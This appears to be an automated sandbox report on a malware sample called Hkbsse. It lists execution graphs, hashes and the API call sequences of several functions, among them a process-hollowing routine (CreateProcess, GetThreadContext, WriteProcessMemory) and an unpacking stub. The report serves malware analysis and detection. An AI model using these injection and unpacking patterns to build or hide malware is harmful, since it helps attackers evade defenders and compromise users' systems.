                    • Instruction Fuzzy Hash: C4D012BAC423155BC721EF90A9458C777DCAE053153504D1FE89593611E7B8A9C88F94

                    Execution Graph

                    Execution Coverage:0.5%
                    Dynamic/Decrypted Code Coverage:26.9%
                    Signature Coverage:0%
                    Total number of Nodes:104
                    Total number of Limit Nodes:5
                    execution_graph 57018 41d872 57019 41d87e CallCatchBlock 57018->57019 57044 41d598 57019->57044 57021 41d885 57022 41d9de 57021->57022 57032 41d8af ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallCatchBlock 57021->57032 57070 41dcb5 4 API calls 2 library calls 57022->57070 57024 41d9e5 57066 436739 57024->57066 57028 41d9f3 57029 41d8ce 57030 41d94f 57052 43965d 57030->57052 57032->57029 57032->57030 57069 436713 59 API calls 4 library calls 57032->57069 57034 41d955 57056 416d80 57034->57056 57045 41d5a1 57044->57045 57072 41dea1 IsProcessorFeaturePresent 57045->57072 57047 41d5ad 57073 4348d4 10 API calls 2 library calls 57047->57073 57049 41d5b2 57050 41d5b6 57049->57050 57074 4348f3 7 API calls 2 library calls 57049->57074 57050->57021 57053 43966b 57052->57053 57054 439666 57052->57054 57053->57034 57075 4393c1 49 API calls 57054->57075 57057 416d8b 57056->57057 57076 40cdf0 36 API calls Concurrency::details::_CancellationTokenState::_RegisterCallback 57057->57076 57077 4365d7 57066->57077 57069->57030 57070->57024 57071 4366fd 23 API calls CallCatchBlock 57071->57028 57072->57047 57073->57049 57074->57050 57075->57053 57078 4365f7 57077->57078 57079 4365e5 57077->57079 57089 43647e 57078->57089 57105 41ddd7 GetModuleHandleW 57079->57105 57082 4365ea 57082->57078 57106 43667d GetModuleHandleExW 57082->57106 57084 41d9eb 57084->57071 57087 43663a 57090 43648a CallCatchBlock 57089->57090 57112 438e6b EnterCriticalSection 57090->57112 57092 436494 57113 4364ea 57092->57113 57094 4364a1 57117 4364bf 57094->57117 57097 43663b 57122 43a3a2 GetPEB 57097->57122 57100 43666a 57103 43667d CallCatchBlock 3 API calls 57100->57103 57101 43664a GetPEB 57101->57100 57102 43665a GetCurrentProcess TerminateProcess 57101->57102 57102->57100 57104 436672 ExitProcess 57103->57104 57105->57082 57107 4366bf 57106->57107 57108 43669c GetProcAddress 57106->57108 57109 4366c5 FreeLibrary 57107->57109 57110 4365f6 57107->57110 57111 4366b1 57108->57111 57109->57110 57110->57078 57111->57107 57112->57092 57115 4364f6 CallCatchBlock 57113->57115 57114 436557 CallCatchBlock 57114->57094 57115->57114 57120 439945 14 API calls CallCatchBlock 57115->57120 57121 438eb3 LeaveCriticalSection 57117->57121 57119 4364ad 57119->57084 57119->57097 57120->57114 57121->57119 57123 436645 57122->57123 57124 43a3bc 57122->57124 57123->57100 57123->57101 57126 43b367 57124->57126 57129 43b2e4 57126->57129 57130 43b312 57129->57130 57135 43b30e 57129->57135 57130->57135 57136 43b21d 57130->57136 57133 43b32c GetProcAddress 57134 43b33c _unexpected 57133->57134 57133->57135 57134->57135 57135->57123 57141 43b22e ___vcrt_FlsGetValue 57136->57141 57137 43b2d9 57137->57133 57137->57135 57138 43b24c LoadLibraryExW 57139 43b267 GetLastError 57138->57139 57138->57141 57139->57141 57140 43b2c2 FreeLibrary 57140->57141 57141->57137 57141->57138 57141->57140 57142 43b29a LoadLibraryExW 57141->57142 57142->57141 57143 448003c 57144 4480049 57143->57144 57158 4480e0f SetErrorMode SetErrorMode 57144->57158 57149 4480265 57150 44802ce VirtualProtect 57149->57150 57152 448030b 57150->57152 57151 4480439 VirtualFree 57156 44805f4 LoadLibraryA 57151->57156 57157 44804be 57151->57157 57152->57151 57153 44804e3 LoadLibraryA 57153->57157 57155 44808c7 57156->57155 57157->57153 57157->57156 57159 4480223 57158->57159 57160 4480d90 57159->57160 57161 4480dad 57160->57161 57162 4480dbb GetPEB 57161->57162 57163 4480238 VirtualAlloc 57161->57163 57162->57163 57163->57149 57164 2891a7e 57165 2891a8d 57164->57165 57168 289221e 57165->57168 57169 2892239 57168->57169 57170 2892242 CreateToolhelp32Snapshot 57169->57170 57171 289225e Module32First 57169->57171 57170->57169 57170->57171 57172 289226d 57171->57172 57173 2891a96 57171->57173 57175 2891edd 57172->57175 57176 2891f08 57175->57176 57177 2891f19 VirtualAlloc 57176->57177 57178 2891f51 57176->57178 57177->57178

                    Executed Functions

                    Function 004099D0 Relevance: 24.7, APIs: 16, Instructions: 668COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00408B00: GetTempPathA.KERNEL32(00000104,?,13877BC0,?,00000000), ref: 00408B47
                    • GetFileAttributesA.KERNEL32(00000000), ref: 00409A43
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesFilePathTemp
                    • String ID:
                    • API String ID: 3199926297-0
                    • Opcode ID: decc8cf0d00bb9ec58cee1965f8fe2dc42d49a477c0570b2cb11aad4758c2aca
                    • Instruction ID: 300cc23dac7bbdec6802486b90ae88e6198841c70d610ab3b66933c1455241e6
                    • Opcode Fuzzy Hash: decc8cf0d00bb9ec58cee1965f8fe2dc42d49a477c0570b2cb11aad4758c2aca
                    • Instruction Fuzzy Hash: E342E370D00248DBEF14EBB8C6497DE7BB1AF06314F24426AD411773C2D7BD5A848BAA
                    Function 0043663B Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 441 43663b-436648 call 43a3a2 444 43666a-436676 call 43667d ExitProcess 441->444 445 43664a-436658 GetPEB 441->445 445->444 446 43665a-436664 GetCurrentProcess TerminateProcess 445->446 446->444
                    APIs
                    • GetCurrentProcess.KERNEL32(?,?,0043663A,?,?,?,?,?,0043768E), ref: 0043665D
                    • TerminateProcess.KERNEL32(00000000,?,0043663A,?,?,?,?,?,0043768E), ref: 00436664
                    • ExitProcess.KERNEL32 ref: 00436676
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CurrentExitTerminate
                    • String ID:
                    • API String ID: 1703294689-0
                    • Opcode ID: 4884c3d6b03f2585f6a3aa4756b085f7f7a66d5c8a7b369877bf872ade5703a9
                    • Instruction ID: f65fa2cbf11c9341c6ec27041228dabd0dafc272b041e2f68e728e25dfebead6
                    • Opcode Fuzzy Hash: 4884c3d6b03f2585f6a3aa4756b085f7f7a66d5c8a7b369877bf872ade5703a9
                    • Instruction Fuzzy Hash: 54E08C31000608BFCF112F55DD0EE493B28FF08786F058425F80586232CB3ADC92CB89
                    Function 0448003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 333 448003c-4480047 334 4480049 333->334 335 448004c-4480263 call 4480a3f call 4480e0f call 4480d90 VirtualAlloc 333->335 334->335 350 448028b-4480292 335->350 351 4480265-4480289 call 4480a69 335->351 353 44802a1-44802b0 350->353 355 44802ce-44803c2 VirtualProtect call 4480cce call 4480ce7 351->355 353->355 356 44802b2-44802cc 353->356 362 44803d1-44803e0 355->362 356->353 363 4480439-44804b8 VirtualFree 362->363 364 44803e2-4480437 call 4480ce7 362->364 366 44804be-44804cd 363->366 367 44805f4-44805fe 363->367 364->362 369 44804d3-44804dd 366->369 370 448077f-4480789 367->370 371 4480604-448060d 367->371 369->367 375 44804e3-4480505 LoadLibraryA 369->375 373 448078b-44807a3 370->373 374 44807a6-44807b0 370->374 371->370 376 4480613-4480637 371->376 373->374 378 448086e-44808be LoadLibraryA 374->378 379 44807b6-44807cb 374->379 380 4480517-4480520 375->380 381 4480507-4480515 375->381 377 448063e-4480648 376->377 377->370 383 448064e-448065a 377->383 389 44808c7-44808f9 378->389 384 44807d2-44807d5 379->384 382 4480526-4480547 380->382 381->382 387 448054d-4480550 382->387 383->370 388 4480660-448066a 383->388 385 4480824-4480833 384->385 386 44807d7-44807e0 384->386 395 4480839-448083c 385->395 390 44807e2 386->390 391 44807e4-4480822 386->391 392 44805e0-44805ef 387->392 393 4480556-448056b 387->393 394 448067a-4480689 388->394 396 44808fb-4480901 389->396 397 4480902-448091d 389->397 390->385 391->384 392->369 398 448056d 393->398 399 448056f-448057a 393->399 400 448068f-44806b2 394->400 401 4480750-448077a 394->401 395->378 402 448083e-4480847 395->402 396->397 398->392 403 448059b-44805bb 399->403 404 448057c-4480599 399->404 405 44806ef-44806fc 400->405 406 44806b4-44806ed 400->406 401->377 407 4480849 402->407 408 448084b-448086c 402->408 416 44805bd-44805db 403->416 404->416 410 448074b 405->410 411 44806fe-4480748 405->411 406->405 407->378 408->395 410->394 411->410 416->387
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0448024D
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: cess$kernel32.dll
                    • API String ID: 4275171209-1230238691
                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction ID: 5f61ef1290bde1b3aee04fed750c5f028482ebd01521e68fed38d8823c5a3cb3
                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction Fuzzy Hash: EC527A74A11229DFDB64CF58C984BADBBB1BF09304F1580DAE50DAB351DB30AA89DF14
                    Function 0043B21D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 417 43b21d-43b229 418 43b2d0-43b2d3 417->418 419 43b2d9 418->419 420 43b22e-43b23f 418->420 423 43b2db-43b2df 419->423 421 43b241-43b244 420->421 422 43b24c-43b265 LoadLibraryExW 420->422 424 43b24a 421->424 425 43b2cd 421->425 426 43b2b7-43b2c0 422->426 427 43b267-43b270 GetLastError 422->427 429 43b2c9-43b2cb 424->429 425->418 428 43b2c2-43b2c3 FreeLibrary 426->428 426->429 430 43b272-43b284 call 43a368 427->430 431 43b2a7 427->431 428->429 429->425 432 43b2e0-43b2e2 429->432 430->431 437 43b286-43b298 call 43a368 430->437 434 43b2a9-43b2ab 431->434 432->423 434->426 436 43b2ad-43b2b5 434->436 436->425 437->431 440 43b29a-43b2a5 LoadLibraryExW 437->440 440->434
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: api-ms-$ext-ms-
                    • API String ID: 0-537541572
                    • Opcode ID: 9abb9358dcd3ddc380508ec514d82bb73023dc79706600e3520e5c488b77e48a
                    • Instruction ID: 21de61e756f92fc94f430986694573f373faed14fbe57d2d8d79661cf7d5140c
                    • Opcode Fuzzy Hash: 9abb9358dcd3ddc380508ec514d82bb73023dc79706600e3520e5c488b77e48a
                    • Instruction Fuzzy Hash: D721D735A01714ABCB228A659C49B2F3754DF09760F2413A2FE05A73A1D738ED0086DD
                    Function 0289221E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 449 289221e-2892237 450 2892239-289223b 449->450 451 289223d 450->451 452 2892242-289224e CreateToolhelp32Snapshot 450->452 451->452 453 289225e-289226b Module32First 452->453 454 2892250-2892256 452->454 455 289226d-289226e call 2891edd 453->455 456 2892274-289227c 453->456 454->453 459 2892258-289225c 454->459 460 2892273 455->460 459->450 459->453 460->456
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02892246
                    • Module32First.KERNEL32(00000000,00000224), ref: 02892266
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275264775.0000000002891000.00000040.00000020.00020000.00000000.sdmp, Offset: 02891000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_2891000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFirstModule32SnapshotToolhelp32
                    • String ID:
                    • API String ID: 3833638111-0
                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction ID: 03bf1925d7a2e5bd1ee2d27509ab29a4bd1c4a8fcdf0cd60ad602aed4d52dd17
                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction Fuzzy Hash: 04F0963E5007157FDB203BF9A88CF6EB6ECAF49624F140629EA46D54C0DB70E8458A61
                    Function 04480E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 462 4480e0f-4480e24 SetErrorMode * 2 463 4480e2b-4480e2c 462->463 464 4480e26 462->464 464->463
                    APIs
                    • SetErrorMode.KERNELBASE(00000400,?,?,04480223,?,?), ref: 04480E19
                    • SetErrorMode.KERNELBASE(00000000,?,?,04480223,?,?), ref: 04480E1E
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction ID: 6da0dfba6629e0b2427a75de31b2c951a5e040edf5eeb36642b56b01bc0074c4
                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                    • Instruction Fuzzy Hash: A2D0123114512877DB003A94DC09BDE7B1CDF05B62F008011FB0DD9180C770954046E5
                    Function 0043B2E4 Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 465 43b2e4-43b30c 466 43b312-43b314 465->466 467 43b30e-43b310 465->467 468 43b316-43b318 466->468 469 43b31a-43b321 call 43b21d 466->469 470 43b363-43b366 467->470 468->470 472 43b326-43b32a 469->472 473 43b349-43b360 472->473 474 43b32c-43b33a GetProcAddress 472->474 476 43b362 473->476 474->473 475 43b33c-43b347 call 4364cb 474->475 475->476 476->470
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9e6d9a063b977dc84b2800641bac0d9326f676cd16d5061fd6fbaf7ab668c9c8
                    • Instruction ID: 6fe4b5f6c01e546057b23e007b78373e331f5fb631c2726a784912e3785aca9d
                    • Opcode Fuzzy Hash: 9e6d9a063b977dc84b2800641bac0d9326f676cd16d5061fd6fbaf7ab668c9c8
                    • Instruction Fuzzy Hash: 6401F937604521AFAB158E69EC44B5B3396EB88760F249122FF10DB254DB74C80197DA
                    Function 02891EDD Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 479 2891edd-2891f17 call 28921f0 482 2891f19-2891f4c VirtualAlloc call 2891f6a 479->482 483 2891f65 479->483 485 2891f51-2891f63 482->485 483->483 485->483
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02891F2E
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275264775.0000000002891000.00000040.00000020.00020000.00000000.sdmp, Offset: 02891000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_2891000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction ID: cba5a14f3603138e55766592bb89f3c3f524fb5131ab5cbbed152f6d38a50392
                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                    • Instruction Fuzzy Hash: 4D112B79A00208EFDB01DF98C989E98BBF5EF08350F098094F9489B361D371EA50DF80

                    Non-executed Functions

                    Function 00407110 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 121memoryprocessthreadCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040713D
                    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0040719B
                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 004071B4
                    • GetThreadContext.KERNEL32(?,00000000), ref: 004071C9
                    • ReadProcessMemory.KERNEL32(?, ,?,00000004,00000000), ref: 004071E9
                    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0040722B
                    • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 00407248
                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00407301
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
                    • String ID: $VUUU$invalid stoi argument
                    • API String ID: 3796053839-3954507777
                    • Opcode ID: 05c0f2c956d8d59827ad70983daf2ae80a7b8a5bf7aa9d1942b02ad8f1c6f345
                    • Instruction ID: 366fe4445ccda86ac4365a5b5e7cea4355bbaaae95b1a624cf57fc235f8353fe
                    • Opcode Fuzzy Hash: 05c0f2c956d8d59827ad70983daf2ae80a7b8a5bf7aa9d1942b02ad8f1c6f345
                    • Instruction Fuzzy Hash: 85416D75644301BFE7209F50DC06F9A7BE8BF88B15F000429F684E62D1DBB4E954CB9A
                    Function 04487377 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 121memoryprocessthreadCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 044873A4
                    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 04487402
                    • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0448741B
                    • GetThreadContext.KERNEL32(?,00000000), ref: 04487430
                    • ReadProcessMemory.KERNEL32(?,00458E08,?,00000004,00000000), ref: 04487450
                    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 04487492
                    • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 044874AF
                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 04487568
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: ProcessVirtual$AllocMemory$ContextCreateFileFreeModuleNameReadThreadWrite
                    • String ID: VUUU
                    • API String ID: 3796053839-2040033107
                    • Opcode ID: 05c0f2c956d8d59827ad70983daf2ae80a7b8a5bf7aa9d1942b02ad8f1c6f345
                    • Instruction ID: 0e5641ff5658990f9a1eff28aea56ff99786c9c881e3c6fb2146325cb0068b23
                    • Opcode Fuzzy Hash: 05c0f2c956d8d59827ad70983daf2ae80a7b8a5bf7aa9d1942b02ad8f1c6f345
                    • Instruction Fuzzy Hash: 49416D75244300BFE7609F50DC06F5A7BE8BF88B15F500529F688E66D1E7B0E514CB5A
                    Function 00420F23 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 284COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00421026
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00421072
                      • Part of subcall function 0042276D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00422860
                    • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 004210DE
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 004210FA
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0042114E
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0042117B
                    • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 004211D1
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
                    • String ID: (
                    • API String ID: 2943730970-3887548279
                    • Opcode ID: 8c69f2fc84a741307255bbb0b4330fe48ac673d4345c19986d42afeb624b92f1
                    • Instruction ID: 5a02515ce4d3d9bed4952b7643743e3afd61b43d92e326ff25b08a62267af8db
                    • Opcode Fuzzy Hash: 8c69f2fc84a741307255bbb0b4330fe48ac673d4345c19986d42afeb624b92f1
                    • Instruction Fuzzy Hash: D5B18B70A00626EFCB18CF59E980B7AB7B4FF58300F54816EE901AB751D374AD91CB99
                    Function 044A118A Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 284COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 044A128D
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 044A12D9
                      • Part of subcall function 044A29D4: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 044A2AC7
                    • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 044A1345
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 044A1361
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 044A13B5
                    • Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 044A13E2
                    • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 044A1438
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
                    • String ID: (
                    • API String ID: 2943730970-3887548279
                    • Opcode ID: 8c69f2fc84a741307255bbb0b4330fe48ac673d4345c19986d42afeb624b92f1
                    • Instruction ID: ef7e6e5a82f8a3226a5d9ddc18f4d2c9aadc502bbebb0ca43ea51cad39773dbc
                    • Opcode Fuzzy Hash: 8c69f2fc84a741307255bbb0b4330fe48ac673d4345c19986d42afeb624b92f1
                    • Instruction Fuzzy Hash: 89B18C71A00616AFDF18CF58D981A7AB7B4FF54304F14816ED842AB741D770F9A1CB94
                    Function 00421712 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00422E0C: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00422E1F
                    • Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00421724
                      • Part of subcall function 00422F1F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00422F49
                      • Part of subcall function 00422F1F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00422FB8
                    • Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00421856
                    • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 004218B6
                    • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 004218C2
                    • Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 004218FD
                    • Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 0042191E
                    • Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 0042192A
                    • Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00421933
                    • Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 0042194B
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
                    • String ID:
                    • API String ID: 2508902052-0
                    • Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                    • Instruction ID: 6480c2bc822c7efa029262303f0049bf934a4c623cf990800cc46984c91a1313
                    • Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
                    • Instruction Fuzzy Hash: 4B816B71F00225AFCB18DF69D5C0A6EB7B6FF98304B6542AED405A7711C774AD42CB88
                    Function 0042ED59 Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042ED92
                      • Part of subcall function 0042903F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00429060
                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 0042EDF8
                    • Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 0042EE10
                    • Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 0042EE1D
                      • Part of subcall function 0042E8C0: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0042E8E8
                      • Part of subcall function 0042E8C0: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0042E980
                      • Part of subcall function 0042E8C0: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0042E98A
                      • Part of subcall function 0042E8C0: Concurrency::location::_Assign.LIBCMT ref: 0042E9BE
                      • Part of subcall function 0042E8C0: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042E9C6
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
                    • String ID:
                    • API String ID: 2363638799-0
                    • Opcode ID: 359cefca154fd1910e9e40920a1d5d2fdc105b942d9e07ab11e460ca5353d7d4
                    • Instruction ID: 5dc5f2011173fc565dcc42a134e2cab6d96b6ac4c2e14078affee907e2800f85
